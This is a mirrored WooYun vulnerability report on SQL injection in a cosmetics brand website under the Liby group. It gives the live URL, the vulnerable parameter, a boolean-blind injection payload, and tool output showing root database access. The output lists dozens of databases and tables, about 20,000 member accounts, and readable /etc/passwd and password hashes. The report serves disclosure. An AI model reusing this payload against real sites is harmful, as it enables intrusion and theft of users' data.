乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-20: 细节已通知厂商并且等待厂商处理中 2016-02-25: 厂商已经主动忽略漏洞,细节向公众公开
立白旗下某品牌网站存在SQL注入漏洞(涉及多个数据库)
高姿化妆品有限公司具有20多年的发展历史,是中国日化行业知名的化妆品企业。公司以其稳定的产品质量获得了广大消费者的信赖和好评。2006年公司与立白集团进行了资产重组,在激烈竞争的化妆品市场诞生了上海新高姿化妆品有限公司。
漏洞URL:http://www.cogi.cn/pcat.php?pcat=1 (GET)立白旗下高资网站存在SQL注入漏洞(涉及多个数据库)
---Parameter: pcat (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pcat=1 AND 6422=6422---web server operating system: Linux Ubuntuweb application technology: Apache 2.4.7, PHP 5.5.12back-end DBMS: MySQL 5current user: 'root@localhost'current database: 'db_cogi'current user is DBA: True
涉及多个数据库
Database: sms_3[6 tables]+----------------------------------------------+| sms_clients || sms_kv || sms_news || sms_picture || sms_show || sms_user |+----------------------------------------------+Database: hrapp[14 tables]+----------------------------------------------+| ad_access || ad_admin || ad_field || ad_input || ad_model || ad_node || ad_order || ad_photo || ad_photo_like || ad_question || ad_role || ad_role_admin || ad_test || ad_user |+----------------------------------------------+Database: hikalimedia[5 tables]+----------------------------------------------+| hik_category || hik_kvlist || hik_product || hik_thumb || hik_user |+----------------------------------------------+Database: cogi[2 tables]+----------------------------------------------+| cogi_register || cogi_user |+----------------------------------------------+Database: mysql[24 tables]+----------------------------------------------+| user || columns_priv || db || event || func || general_log || help_category || help_keyword || help_relation || help_topic || host || ndb_binlog_index || plugin || proc || procs_priv || proxies_priv || servers || slow_log || tables_priv || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_type |+----------------------------------------------+Database: cat_maxmara_150624[22 tables]+----------------------------------------------+| cms_article || cms_article_cate || cms_material || mar_action || mar_bag || mar_banner || mar_city || mar_classify || mar_cloths || mar_lastvideo || mar_shop || mar_video || mar_word || shop_organization || sys_company || sys_log || sys_permission || sys_role || sys_role_permission || sys_user || sys_user_role || sys_welcome |+----------------------------------------------+Database: smartdb[5 tables]+----------------------------------------------+| smart_case || smart_category || smart_consulting || smart_dynamic || smart_user |+----------------------------------------------+Database: zhoudafu[4 tables]+----------------------------------------------+| zdf_admin || zdf_blesses || zdf_modules || zdf_users |+----------------------------------------------+Database: elle_db_a[7 tables]+----------------------------------------------+| calendars || kvimage || mybenefits || mybenefitsaddress || styles || styles4pic || userinfo |+----------------------------------------------+Database: vendor3[19 tables]+----------------------------------------------+| module || category || comment || content3 || contentindex || greetingcard || log || manager || member || menu || module_field || schools || serviceorders || sessionvalue || spider_log || typelist || usergroup || webconfig || webconfig_param |+----------------------------------------------+Database: zphome[159 tables]+----------------------------------------------+| TABLE 106 || a_admin || a_modules || a_projects || adidas1309_photos || aha_admin || aha_anwsers || aha_ranks || aha_results || aha_shares || aha_stageanswers || aha_users || artistry151012 || banggo4_codes || banggo4_prizes || banggo4_scores || banggo_admin || banggo_blocks || banggo_data || banggo_daygifts || banggo_gameinfos || banggo_gifts || banggo_modules || banggo_questions || banggo_settings || banggo_tasks || banggo_transactions || banggo_userexchanges || banggo_usergifts || banggo_users || banggo_usertasks || chanel0611_admin || chanel0611_modules || chanel0611_photos || christmas_admin || christmas_goods || christmas_modules || christmas_photos || cms_categories || cms_comments || cms_extend || cms_meta || cms_page_meta || cms_pages || cms_post_meta || cms_posts || cms_sessions || cms_users || cogiegg_admin || cogiegg_breaks || cogiegg_gifts || cogiegg_modules || cogiegg_prizes || cogiegg_users || dove130531_userimages || dove130531_users || edm_users || esteelauder1403_photos || esteelauder1403_votes || helena_register || helena_user || hr_white_users || lavenue_active || lavenue_brand || lavenue_category || lavenue_club || lavenue_newopen || lavenue_news || lavenue_register || lavenue_thumb || lavenue_user || lavenue_vedio || loreal100_admin || loreal100_adminmodules || loreal100_users || loreal100_votes || lux1304_admin || lux1304_blackips || lux1304_cards || lux1304_cards_001 || lux1304_modules || lux1304_offlines || lux1304_shares || lux1304_tests_001 || lux1304_tests_new || lux1304_users || lux1304_users_001 || lux1304_users_002 || lux1304_users_003 || mascara_users || maxmara0428_register || maxmara0428_user || maxmara150512 || maxmara_prize || maxmara_register || maxmara_registerprize || maxmara_score || maxmara_user || maxmara_webconfig || maxmara_winaprize || maxus0820_admin || maxus0820_ci_sessions || maxus0820_config_common || maxus0820_config_site || maxus0820_config_site_admin || maxus0820_model || maxus0820_power || maxus0820_power_group || maxus0820_vote || mrts_wechat_0 || neiman_votes || nzj_register || nzj_user || nzj_vote || oreal0721_admin || oreal0721_candidate_info || oreal0721_ci_sessions || oreal0721_config_common || oreal0721_config_site || oreal0721_config_site_admin || oreal0721_power || oreal0721_power_group || oreal0721_vote_log || prodigycream_users || pt0819 || pt1225_prd || pt1225_vote || restylane1304_admin || restylane1304_modules || restylane1304_smiles || restylane1304_tips || restylane1304_userimages || restylane1304_users || restylane1304_votes || sheep_userimages || sheep_users || sheep_votes || shj2012_users || siemens_blesses || tiffany1403_votes || whiteadmin || whiteuserinfo || whiteusers || whiteusertips || yvesrocher_users || zdf_admin || zdf_blesses || zdf_modules || zdf_users || zdfu_prize || zdfu_register || zdfu_registerprize || zdfu_score || zdfu_user || zdfu_webconfig || zdfu_winaprize || zippo151121_code || zippo151121_lottery || zippo151121_user |+----------------------------------------------+Database: test[7 tables]+----------------------------------------------+| calendars || kvimage || mybenefits || mybenefitsaddress || styles || styles4pic || userinfo |+----------------------------------------------+Database: v6_hr[3 tables]+----------------------------------------------+| customer || first_five_invit || regular_customer |+----------------------------------------------+Database: style_business[17 tables]+----------------------------------------------+| ds_brand || ds_category || ds_colour || ds_deliveryaddress || ds_emailtemplate || ds_excandpro || ds_exclusive || ds_homepage || ds_homepagepro || ds_message || ds_messagetype || ds_orders || ds_product || ds_register || ds_shoppingcart || ds_thumb || ds_user |+----------------------------------------------+Database: kc_db[6 tables]+----------------------------------------------+| kc_clients || kc_kv || kc_news || kc_picture || kc_show || kc_user |+----------------------------------------------+Database: information_schema[40 tables]+----------------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_STATS || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_RESET || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_TRX || KEY_COLUMN_USAGE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+----------------------------------------------+Database: iaactdb[6 tables]+----------------------------------------------+| iaact_clients || iaact_kv || iaact_news || iaact_picture || iaact_show || iaact_user |+----------------------------------------------+Database: johnhenry[5 tables]+----------------------------------------------+| archive_coupon || archive_register || archive_registercoupon || archive_user || archive_webconfig |+----------------------------------------------+Database: db_cogi[9 tables]+----------------------------------------------+| tb_article || tb_media || tb_menber || tb_pcat || tb_prd || tb_pseries || tb_star || tb_trend || tb_user |+----------------------------------------------+Database: asus100[7 tables]+----------------------------------------------+| asus_hobbytype || asus_person || asus_picture || asus_user || asus_usertype || asus_weibomsg || asus_weibotype |+----------------------------------------------+Database: wechatcms[283 tables]+----------------------------------------------+| hr_admin || hr_details || hr_gifts || hr_orders || hr_users || pigcms_access || pigcms_activity || pigcms_adma || pigcms_alipay_config || pigcms_api || pigcms_areply || pigcms_attribute || pigcms_autumns_box || pigcms_autumns_ip || pigcms_autumns_open || pigcms_banners || pigcms_behavior || pigcms_broker || pigcms_broker_client || pigcms_broker_commission || pigcms_broker_item || pigcms_broker_optionlog || pigcms_broker_translation || pigcms_broker_user || pigcms_busines || pigcms_busines_comment || pigcms_busines_main || pigcms_busines_pic || pigcms_busines_second || pigcms_car || pigcms_car_utility || pigcms_carmodel || pigcms_carnews || pigcms_carowner || pigcms_carsaler || pigcms_carseries || pigcms_carset || pigcms_caruser || pigcms_case || pigcms_caseclass || pigcms_catemenu || pigcms_classify || pigcms_company || pigcms_company_staff || pigcms_crowdfunding || pigcms_crowdfunding_focus || pigcms_crowdfunding_order || pigcms_crowdfunding_reward || pigcms_custom_field || pigcms_custom_info || pigcms_custom_limit || pigcms_custom_set || pigcms_dining_table || pigcms_dish || pigcms_dish_company || pigcms_dish_like || pigcms_dish_order || pigcms_dish_sort || pigcms_dish_table || pigcms_dishout_manage || pigcms_dishout_salelog || pigcms_diyform || pigcms_diyform_set || pigcms_diymen_class || pigcms_diymen_set || pigcms_dream || pigcms_estate || pigcms_estate_album || pigcms_estate_expert || pigcms_estate_housetype || pigcms_estate_impress || pigcms_estate_impress_add || pigcms_estate_nav || pigcms_estate_son || pigcms_files || pigcms_flash || pigcms_forum_comment || pigcms_forum_config || pigcms_forum_message || pigcms_forum_topics || pigcms_funclass || pigcms_function || pigcms_funintro || pigcms_game_config || pigcms_game_records || pigcms_games || pigcms_greeting_card || pigcms_helping || pigcms_helping_user || pigcms_home || pigcms_home_background || pigcms_host || pigcms_host_list_add || pigcms_host_order || pigcms_hotels_house || pigcms_hotels_house_sort || pigcms_hotels_image || pigcms_hotels_order || pigcms_images || pigcms_img || pigcms_img_multi || pigcms_indent || pigcms_invite || pigcms_invite_enroll || pigcms_invite_meeting || pigcms_invite_partner || pigcms_invite_plan || pigcms_invite_user || pigcms_keyword || pigcms_leave || pigcms_links || pigcms_live || pigcms_live_company || pigcms_live_content || pigcms_lottery || pigcms_lottery_cheat || pigcms_lottery_record || pigcms_market || pigcms_market_area || pigcms_market_cate || pigcms_market_nav || pigcms_market_park || pigcms_market_slide || pigcms_medical_set || pigcms_medical_user || pigcms_member || pigcms_member_card_contact || pigcms_member_card_coupon || pigcms_member_card_coupon_record || pigcms_member_card_create || pigcms_member_card_custom || pigcms_member_card_exchange || pigcms_member_card_focus || pigcms_member_card_gifts || pigcms_member_card_info || pigcms_member_card_integral || pigcms_member_card_notice || pigcms_member_card_pay_record || pigcms_member_card_set || pigcms_member_card_sign || pigcms_member_card_use_record || pigcms_member_card_vip || pigcms_mobilesite || pigcms_moopha_article || pigcms_moopha_attachement || pigcms_moopha_channel || pigcms_moopha_channel_contentattribute || pigcms_moopha_keywords || pigcms_moopha_picture || pigcms_moopha_site || pigcms_moopha_template || pigcms_moopha_user || pigcms_msg || pigcms_nearby_user || pigcms_news || pigcms_node || pigcms_norms || pigcms_notice_record || pigcms_ordering_class || pigcms_ordering_set || pigcms_orderprinter || pigcms_other || pigcms_panorama || pigcms_photo || pigcms_photo_list || pigcms_photo_log || pigcms_platform_pay || pigcms_popularity || pigcms_popularity_prize || pigcms_popularity_share || pigcms_popularity_user || pigcms_present || pigcms_problem_game || pigcms_problem_option || pigcms_problem_question || pigcms_problem_question_log || pigcms_problem_user || pigcms_product || pigcms_product_attribute || pigcms_product_cart || pigcms_product_cart_list || pigcms_product_cat || pigcms_product_comment || pigcms_product_detail || pigcms_product_diningtable || pigcms_product_group || pigcms_product_image || pigcms_product_mail_price || pigcms_product_relation || pigcms_product_setting || pigcms_punish || pigcms_punish_item || pigcms_qcloud_sendout || pigcms_qcloud_user || pigcms_question_bank || pigcms_recipe || pigcms_recognition || pigcms_red_packet || pigcms_red_packet_exchange || pigcms_red_packet_log || pigcms_red_packet_prize || pigcms_red_packet_reward || pigcms_renew || pigcms_reply || pigcms_reply_info || pigcms_requestdata || pigcms_research || pigcms_research_answer || pigcms_research_question || pigcms_research_result || pigcms_reservation || pigcms_reservebook || pigcms_role || pigcms_role_user || pigcms_router || pigcms_router_config || pigcms_school_cat || pigcms_school_classify || pigcms_school_score || pigcms_school_set_index || pigcms_school_students || pigcms_school_tcourse || pigcms_school_teachers || pigcms_seckill_action || pigcms_seckill_base_shop || pigcms_seckill_book || pigcms_seckill_share || pigcms_seckill_shop_thum || pigcms_seckill_users || pigcms_selfform || pigcms_selfform_input || pigcms_selfform_value || pigcms_send_message || pigcms_share || pigcms_share_set || pigcms_sign_conf || pigcms_sign_in || pigcms_sign_set || pigcms_site_plugmenu || pigcms_sms_code || pigcms_sms_expendrecord || pigcms_sms_record || pigcms_snccode || pigcms_store_flash || pigcms_styleset || pigcms_system_info || pigcms_taobao || pigcms_tempmsg || pigcms_text || pigcms_token_open || pigcms_twitter_count || pigcms_twitter_log || pigcms_twitter_remove || pigcms_twitter_set || pigcms_unitary || pigcms_unitary_cart || pigcms_unitary_lucknum || pigcms_unitary_order || pigcms_unitary_user || pigcms_update_record || pigcms_upyun_attachement || pigcms_user || pigcms_user_group || pigcms_user_request || pigcms_userinfo || pigcms_users || pigcms_voiceresponse || pigcms_vote || pigcms_vote_item || pigcms_vote_record || pigcms_weather || pigcms_wecha_user || pigcms_wechat_group || pigcms_wechat_group_list || pigcms_wechat_scene || pigcms_wecht_grout || pigcms_wedding || pigcms_wedding_info || pigcms_wehcat_member_enddate || pigcms_wxuser || pigcms_yeepay_tmp || pigcms_zhida || tp_system_info |+----------------------------------------------+Database: techpool[16 tables]+----------------------------------------------+| meet_answer || meet_guestinfo || meet_invite || meet_meetingguestrelation || meet_meetinginfo || meet_meetingplace || meet_meetingtype || meet_meetinguserrelation || meet_news || meet_optionresult || meet_question || meet_schedule || meet_talentplan || meet_user || meet_userinfo || meet_userloginfo |+----------------------------------------------+Database: web0[13 tables]+----------------------------------------------+| ad_access || ad_admin || ad_field || ad_input || ad_model || ad_node || ad_order || ad_photo || ad_photo_like || ad_question || ad_role || ad_role_admin || ad_user |+----------------------------------------------+Database: tianpu[27 tables]+----------------------------------------------+| cms_article || cms_article_cate || cms_material || hos_article || hos_comment || hos_conference || hos_guide || hos_newspper || hos_notice_contributors || hos_subject || hos_time || hos_time_newspper || hos_transshipment || hos_video || hos_video_type || hos_writer || hos_writer_type || hos_year || shop_organization || sys_company || sys_log || sys_permission || sys_role || sys_role_permission || sys_user || sys_user_role || sys_welcome |+----------------------------------------------+Database: appnice[26 tables]+----------------------------------------------+| admin || api_access || api_keys || api_limits || api_logs || api_tokens || comments || config_common || config_site || config_site_admin || integrals || labels || labels2stores || messages || operates || photos || power || power_group || push_logs || recommend_type || sources || stores || tags || thesaurus || tops || users |+----------------------------------------------+Database: vendor_a[6 tables]+----------------------------------------------+| forte06_greetingcard || forte06_manager || forte06_menu || forte06_usergroup || forte06_webconfig || forte06_webconfig_param |+----------------------------------------------+Database: performance_schema[17 tables]+----------------------------------------------+| cond_instances || events_waits_current || events_waits_history || events_waits_history_long || events_waits_summary_by_instance || events_waits_summary_by_thread_by_event_name || events_waits_summary_global_by_event_name || file_instances || file_summary_by_event_name || file_summary_by_instance || mutex_instances || performance_timers || rwlock_instances || setup_consumers || setup_instruments || setup_timers || threads |+----------------------------------------------+Database: hrapp_crowdfunding2016[15 tables]+----------------------------------------------+| ad_access || ad_admin || ad_field || ad_input || ad_model || ad_node || ad_order || ad_order_pay_detail || ad_paytest || ad_photo || ad_product || ad_question || ad_role || ad_role_admin || ad_user |+----------------------------------------------+Database: vendor1[36 tables]+----------------------------------------------+| elle0811_members || elle0811_users || elle0811_votes || forte150521_awards || forte150521_draws || forte150521_userinfos || forte150521_users || forte150921_cities || forte150921_donates || forte150921_members || forte150921_projects || forte150921_userinfos || forte150921_users || honda0720_likes || honda0720_photos || honda0720_users || hr150211_messages || hr150211_users || lavenue_active || lavenue_brand || lavenue_category || lavenue_club || lavenue_newopen || lavenue_news || lavenue_register || lavenue_thumb || lavenue_user || lavenue_vedio || techpool_meetings || techpool_members || techpool_signs || techpool_users || zippo_codes || zippo_members || zippo_users || zippo_votes |+----------------------------------------------+Database: styletv[4 tables]+----------------------------------------------+| tb_bindaccount || tb_generalize || tb_sysinfo || tb_user |+----------------------------------------------+Database: acense[3 tables]+----------------------------------------------+| dolls || migrations || tools |+----------------------------------------------+Database: vendor5[24 tables]+----------------------------------------------+| 360_categories_entries || 360_categories || 360_category_groups || 360_content_field_types || 360_content_fields || 360_content_types_admin_groups || 360_content_types || 360_entries_data || 360_entries || 360_galleries || 360_gallery_images || 360_groups || 360_navigation_items || 360_navigations || 360_product_forward || 360_product_post || 360_product || 360_publish_logs || 360_revision_resource_types || 360_revisions || 360_settings || 360_snippets || 360_users || 360_weibo_user |+----------------------------------------------+Database: vendor4[40 tables]+----------------------------------------------+| module || advert || category || comment || content29 || content3 || content30 || content31 || content32 || content33 || contentindex || log || manager || member || menu || mlqs_category || mlqs_comment || mlqs_content3 || mlqs_contentindex || mlqs_log || mlqs_manager || mlqs_member || mlqs_menu || mlqs_module || mlqs_module_field || mlqs_schools || mlqs_sessionvalue || mlqs_spider_log || mlqs_typelist || mlqs_usergroup || mlqs_webconfig || mlqs_webconfig_param || mlqs_weekresult || module_field || schools || spider_log || typelist || usergroup || webconfig || webconfig_param |+----------------------------------------------+Database: cat_money[47 tables]+----------------------------------------------+| cms_article || cms_article_cate || cms_material || man_advertise || man_advertise_audit || man_advice || man_bankcard || man_banner || man_bill || man_borrower || man_buyinfo || man_check || man_credite || man_credite_bag || man_dart_get || man_dart_send || man_dart_week || man_dictionary || man_exception || man_export || man_firstbanner || man_formula || man_hold_image || man_interest || man_often_quest || man_page || man_pay_order || man_pro_crbag || man_product_lock || man_product_nolock || man_profit || man_profit_info || man_push || man_recharge || man_redeem || man_subscribe || man_trade || man_user || shop_organization || sys_company || sys_log || sys_permission || sys_role || sys_role_permission || sys_user || sys_user_role || sys_welcome |+----------------------------------------------+Database: cat_iself[26 tables]+----------------------------------------------+| cms_article || cms_article_cate || cms_material || is_area || is_check || is_city || is_collect || is_custom || is_like || is_privilege || is_product || is_season_action || is_shop || is_travel || is_tripInfo || is_user || is_user_like || shop_organization || sys_company || sys_log || sys_permission || sys_role || sys_role_permission || sys_user || sys_user_role || sys_welcome |+----------------------------------------------+
高资会员账号信息近2万条
Database: db_cogi+------------+---------+| Table | Entries |+------------+---------+| tb_menber | 19522 || tb_prd | 227 || tb_media | 101 || tb_trend | 88 || tb_pseries | 32 || tb_pcat | 19 || tb_article | 4 || tb_star | 2 || tb_user | 2 |+------------+---------+
可读取/etc/passwd文件
多个数据库用户密码可读取
数据库root用户密码可通过cmd5获取
过滤,并修改数据库密码
危害等级:无影响厂商忽略
忽略时间:2016-02-25 08:10
漏洞Rank:4 (WooYun评价)
暂无